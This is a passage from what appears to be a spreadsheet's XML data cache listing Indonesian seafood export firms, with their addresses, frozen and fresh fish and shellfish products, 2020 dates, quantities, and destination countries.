    <d v="2020-06-25T00:00:00"/>
    <n v="336990"/>
    <m/>
    <s v="Germany, Greece, Italy, Lebanon, Netherlands, Peru, Turkey, United States"/>
  </r>
  <r>
    <n v="21129"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Lobster Beku"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Sidoarjo"/>
    <s v="China, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20625"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <s v="Chile, Philippines, Singapore, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="20713"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Beku"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Bekasi, Kota Tangerang"/>
    <s v="Japan, Korea, Democratic People's Republic of, Singapore, United States"/>
  </r>
  <r>
    <n v="19922"/>
    <x v="71"/>
    <s v="PT. MATSYARAJA ARNAWA STAMBHAPURA"/>
    <s v="Komplek Pelabuhan Perikanan Tenau, Jl. Yos Sudarso, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Demersal Segar (Lencam, Anggoli, Kerapu, Kakap, Kaci-kaci)"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, Germany, Singapore, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="20718"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Singapore, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19637"/>
    <x v="72"/>
    <s v="PT. SUMBERLAUT BENGINDO"/>
    <s v="Jl. Raya Sunan Gunung Jati No.15-16 RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kerang Beku"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="750000"/>
    <m/>
    <s v="Canada, China, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19640"/>
    <x v="72"/>
    <s v="PT. SUMBERLAUT BENGINDO"/>
    <s v="Jl. Raya Sunan Gunung Jati No.15-16 RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Scallop Beku"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="75000"/>
    <m/>
    <s v="Canada, China, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="20808"/>
    <x v="66"/>
    <s v="PT. MUARA ANUGERAH JAYA"/>
    <s v="Jl. Muara Baru Ujung Blok S No.14, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Lencam, Sebelah, Kuwe, Kerapu, Layur, Bawal, Samge, Kakap, Ayam-ayam, Barramundi)"/>
    <d v="2020-07-06T00:00:00"/>
    <n v="100"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Malaysia, Singapore, South Africa, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19430"/>
    <x v="73"/>
    <s v="PT. MANDIRI SUKSES JAYA PERKASA"/>
    <s v="Jl. Pusat Pemasaran Ikan No.74,75,76 Pelabuhan Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="1200"/>
    <m/>
    <s v="China, Hong Kong, Japan, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19433"/>
    <x v="29"/>
    <s v="PT, MARITIM NUSANTARA PERKASA"/>
    <s v="Kawasan Pelabuhan Perikanan Nizam Zachman Jl, Muara Baru Ujung Blok T No,8 RT 020 RW 017, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-12T00:00:00"/>
    <n v="1200000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20278"/>
    <x v="74"/>
    <s v="PT. CELEBES BERKAH NIAGA"/>
    <s v="Pergudangan Garuda Blok B2, Jl. Lantebung No.42, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-03-05T00:00:00"/>
    <n v="2950000"/>
    <s v="Kota Surabaya"/>
    <s v="Chile, China, India, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="19632"/>
    <x v="75"/>
    <s v="UD, NAGATA TUNA"/>
    <s v="Jl, Cot Aron 2 No,2, Kel, Punge Blang Cut, Kec, Jaya Baru, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Gurita Beku"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Japan, Malaysia, Saudi Arabia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="19633"/>
    <x v="75"/>
    <s v="UD, NAGATA TUNA"/>
    <s v="Jl, Cot Aron 2 No,2, Kel, Punge Blang Cut, Kec, Jaya Baru, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya"/>
    <s v="China, Hong Kong, Japan, Malaysia, Saudi Arabia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20306"/>
    <x v="61"/>
    <s v="CV. JASUMA"/>
    <s v="Jl. Raya Prancis Komplek Pergudangan Kosambi Permai Blok E-9, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Segar (Lemuru, Tembang, Kembung, Sarden, Cakalang, Tenggiri)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="20976"/>
    <x v="76"/>
    <s v="CV. SEMBILAN PUTRA JAYA"/>
    <s v="Jl. Sultan Abdullah Raya No.43A, Kel. Tallo, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Barramundi, Katamba, Senangin, Kerapu, Kakaktua)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Malaysia, Saudi Arabia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20977"/>
    <x v="76"/>
    <s v="CV. SEMBILAN PUTRA JAYA"/>
    <s v="Jl. Sultan Abdullah Raya No.43A, Kel. Tallo, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Malaysia, Saudi Arabia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="19249"/>
    <x v="58"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="150"/>
    <s v="Kota Jakarta Utara, Kabupaten Trenggalek, Kabupaten Tulungagung, Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kabupaten Maluku Tenggara, Kabupaten Sorong, Kabupaten Merauke"/>
    <s v="China, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19248"/>
    <x v="58"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Gurami, Bandeng, Patin, Nila)"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Utara, Kabupaten Trenggalek, Kabupaten Tulungagung, Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kabupaten Maluku Tenggara, Kota Sorong, Kabupaten Merauke"/>
    <s v="China, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19241"/>
    <x v="58"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Barramundi, Mata Besar, Bawal, Kerapu, Layur, Kakatua, Kakap, Kurisi, Ekor Kuning)"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="180000"/>
    <s v="Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kabupaten Sorong"/>
    <s v="China, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20809"/>
    <x v="66"/>
    <s v="PT. MUARA ANUGERAH JAYA"/>
    <s v="Jl. Muara Baru Ujung Blok S No.14, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-07-06T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19360"/>
    <x v="15"/>
    <s v="UD, HALIM JAYA"/>
    <s v="Jl, Raya Deli Tua - Patumbak Km 18,5, Jl, Lantasan Baru No,1, Kel, Cinta Damai, Kec, Patumbak, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Hidup"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="20969"/>
    <x v="77"/>
    <s v="PT. SANANA PELANGI INDONESIA"/>
    <s v="Desa Pohea RT 005 RW 002, Kec. Sanana Utara, Kabupaten Kepulauan Sula&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Loin Segar"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="20970"/>
    <x v="77"/>
    <s v="PT. SANANA PELANGI INDONESIA"/>
    <s v="Desa Pohea RT 005 RW 002, Kec. Sanana Utara, Kabupaten Kepulauan Sula&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Malalugis, Cakalang)"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="21283"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="51190"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="21313"/>
    <x v="2"/>
    <s v="PT. ALAM JAYA"/>
    <s v="JL. Rungkut Industri II/25, Kel. Tenggilis Mejoyo, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="413164.7"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya, Kota Balikpapan"/>
    <s v="Canada, China, France, Greece, Italy, New Zealand, Spain, Viet Nam"/>
  </r>
  <r>
    <n v="20120"/>
    <x v="79"/>
    <s v="PT. ALTER TRADE INDONESIA"/>
    <s v="Jl. Industri No.72, Kel. Sukorejo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Pusat, Kota Denpasar"/>
    <s v="Canada, China, Japan, Korea, Republic of, Singapore, United States"/>
  </r>
  <r>
    <n v="17094"/>
    <x v="21"/>
    <s v="PT. KARYA AGUNG LESTARI JAYA"/>
    <s v="Jl. Gabion Perikanan Nusantara No.4, Kel. Bagan Deli , Kec. Medan Belawan , Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Bawal, Kakap, Lidah)"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Medan"/>
    <s v="Australia, Japan, Korea, Democratic People's Republic of, Malaysia"/>
  </r>
  <r>
    <n v="17095"/>
    <x v="21"/>
    <s v="PT. KARYA AGUNG LESTARI JAYA"/>
    <s v="Jl. Gabion Perikanan Nusantara No.4, Kel. Bagan Deli , Kec. Medan Belawan , Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kuring, Sarden, Aso-aso, Layang, Perak-perak, Tenggiri)"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="700000"/>
    <s v="Kota Medan"/>
    <s v="Australia, Japan, Korea, Democratic People's Republic of, Malaysia"/>
  </r>
  <r>
    <n v="17096"/>
    <x v="21"/>
    <s v="PT. KARYA AGUNG LESTARI JAYA"/>
    <s v="Jl. Gabion Perikanan Nusantara No.4, Kel. Bagan Deli , Kec. Medan Belawan , Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Medan"/>
    <s v="Australia, Japan, Korea, Democratic People's Republic of, Malaysia"/>
  </r>
  <r>
    <n v="20372"/>
    <x v="80"/>
    <s v="CV. JASA LAUT"/>
    <s v="Jl. Kapten Muslim Komplek Tata Plaza No.12B, Kel. Dwi Kora, Kec. Medan Helvetia, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Segar (Mata Besar, Gulama, Kerapu, Bawal, Kakap)"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Medan"/>
    <s v="Hong Kong, Malaysia, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20308"/>
    <x v="61"/>
    <s v="CV. JASUMA"/>
    <s v="Jl. Raya Prancis Komplek Pergudangan Kosambi Permai Blok E-9, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Kerapu, Kakatua, Bawal, Kakap Merah)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20309"/>
    <x v="61"/>
    <s v="CV. JASUMA"/>
    <s v="Jl. Raya Prancis Komplek Pergudangan Kosambi Permai Blok E-9, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tembang, Kembung, Sarden, Cakalang, Tenggiri)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20310"/>
    <x v="61"/>
    <s v="CV. JASUMA"/>
    <s v="Jl. Raya Prancis Komplek Pergudangan Kosambi Permai Blok E-9, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20311"/>
    <x v="61"/>
    <s v="CV. JASUMA"/>
    <s v="Jl. Raya Prancis Komplek Pergudangan Kosambi Permai Blok E-9, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21030"/>
    <x v="81"/>
    <s v="PT. DSINDO ABADI INTERNASIONAL"/>
    <s v="Jl. Raya Perancis Pergudangan 75 Blok F RT/RW 004/008 Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21031"/>
    <x v="81"/>
    <s v="PT. DSINDO ABADI INTERNASIONAL"/>
    <s v="Jl. Raya Perancis Pergudangan 75 Blok F RT/RW 004/008 Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kerapu)"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21032"/>
    <x v="81"/>
    <s v="PT. DSINDO ABADI INTERNASIONAL"/>
    <s v="Jl. Raya Perancis Pergudangan 75 Blok F RT/RW 004/008 Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sotong Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21033"/>
    <x v="81"/>
    <s v="PT. DSINDO ABADI INTERNASIONAL"/>
    <s v="Jl. Raya Perancis Pergudangan 75 Blok F RT/RW 004/008 Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cumi-Cumi Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21034"/>
    <x v="81"/>
    <s v="PT. DSINDO ABADI INTERNASIONAL"/>
    <s v="Jl. Raya Perancis Pergudangan 75 Blok F RT/RW 004/008 Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Scallop Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21035"/>
    <x v="81"/>
    <s v="PT. DSINDO ABADI INTERNASIONAL"/>
    <s v="Jl. Raya Perancis Pergudangan 75 Blok F RT/RW 004/008 Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Keong Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21036"/>
    <x v="81"/>
    <s v="PT. DSINDO ABADI INTERNASIONAL"/>
    <s v="Jl. Raya Perancis Pergudangan 75 Blok F RT/RW 004/008 Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cunang Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20124"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Demersal Segar (Lencam, Kerapu, Layur, Bawal, Kakap, Kurisi, Barramundi)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="90000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat, Kabupaten Lombok Tengah"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20125"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Layur, Bawal, Kakap, Kurisi, Barramundi)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="90000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bandung, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20151"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Pelagis Beku (Tongkol, Lemadang, Marlin, Cakalang, Tenggiri)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Bandung, Kabupaten Sidoarjo, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20097"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Kerang Hidup"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bandung, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20098"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Kerang Segar"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Pusat, Kota Bandung, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="16887"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="16888"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Air Tawar Hidup"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="800"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="16893"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Hidup"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="16894"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="800"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21317"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Segar"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Timur"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21318"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
